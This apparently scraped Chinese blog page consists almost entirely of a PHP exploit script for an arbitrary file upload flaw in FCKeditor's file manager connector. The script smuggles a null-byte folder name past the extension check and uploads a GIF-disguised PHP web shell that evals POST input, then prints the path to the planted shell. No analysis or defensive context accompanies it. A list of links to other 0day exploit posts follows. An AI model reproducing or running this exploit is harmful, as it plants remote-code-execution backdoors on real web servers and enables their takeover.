FCKeditor-Exp通杀0day
来源:互联网 发布:转视频格式软件 编辑:程序博客网 时间:2024/05/21 08:40
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
$match = array();
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
print $resp;
return $resp;
}
function connector_response($html)
{
global $match;
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| FCKEditor Servelet Arbitrary File Upload Exploit |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /\n";
print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = "ice.gif";
$foldername = "ice.php%00.gif";
$connector = "editor/filemanager/connectors/php/connector.php";
$payload = "-----------------------------265001916915724\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[ice]) ?>'."\n";
$payload .= "-----------------------------265001916915724--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print $packet;
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
print $packet;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Job done! try http://${host}/$match[2] \n";
?>
- FCKeditor-Exp通杀0day
- Discuz! X2.0 0day EXP
- Fckeditor 2.6.3 漏洞 EXP
- 大学网站沦陷之Journal报刊系统Fckeditor-0day
- 国外漏洞公布(0day,exp)站点集
- phpcms 2008最新0day加批量EXP代码
- 最新Java 0day漏洞分析及EXP下载
- 高危Struts2 0day漏洞,EXP已流传
- 又一个0day EXP出现 【希望大家不要用来攻击网站】
- 最新Discuz! X1- 1.5 exp -2011 dz论坛通杀 0DAY
- 计算机漏洞安全相关的概念POC | EXP | VUL | CVE | 0DAY
- MS15-077 HT Windows字体提权0day 源码+exp
- 计算机漏洞安全相关的概念POC | EXP | VUL | CVE | 0DAY
- day 0
- DAY 0
- 知道版本对于出0day后批量攻击dedecms有非常大的帮助,先判断版本再选择相应exp,效率大增
- JSF2.0应用FCKEditor
- FCKEditor
- 大米实习笔试题
- 2012.4.21腾讯实习生一面
- CSS中的浮动和定位
- 《Spring In action》学习笔记——AOP(面向切面编程)
- 进程状态变迁图
- FCKeditor-Exp通杀0day
- C++下Windows Forms + MFC + WTL + wxWidgets + Qt + GTK+ 非官方综合比较
- SQL语句学习——alias,连接
- MobclickAgent_onPause_Android
- jsp页面传值获取问题的方法
- 让cocos2d-x for WP7添加中文支持
- Flex Mobile Development – Callout Component Sample (with source)
- 用户模式与内核模式
- Exchange 2003 升级到Exchange 2010 之 HUB 角色的安装